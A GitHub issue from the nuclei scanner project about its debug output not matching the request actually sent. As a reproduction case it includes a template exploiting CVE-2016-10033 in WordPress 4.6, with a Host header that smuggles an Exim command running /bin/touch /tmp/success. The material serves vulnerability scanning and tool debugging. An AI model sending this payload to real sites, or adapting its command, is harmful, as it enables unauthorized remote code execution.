### ISSUE TITLE
[issue] debug information discrepancy with actual request

### ISSUE THREAD

**Issue by ehsandeep** [projectdiscovery/nuclei#547]
**Describe the bug**
Debug flag doesn't display the same request as it gets sent. 

**Nuclei version**
Dev version

Template to reproduce:-

<details>

```yaml
id: CVE-2016-10033

info:
  name: Wordpress 4.6 Remote Code Execution
  author: princechaddha
  severity: high
  reference: https://exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html
  tags: cve,cve2016,wordpress,rce

requests:
  - raw:
      - |
        POST /wp-login.php?action=lostpassword HTTP/1.1
        Host: target(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}touch${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}success}} null)
        Connection: close       
        User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)      
        Accept: */*       
        Content-Length: 57
        Content-Type: application/x-www-form-urlencoded

        wp-submit=Get+New+Password&redirect_to=&user_login=admin

    unsafe: true
    disable-automatic-host-header: true

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "wp-login.php?checkemail=confirm"
        part: header

      - type: status
        status:
          - 302
```

</details>

cc @princechaddha ^
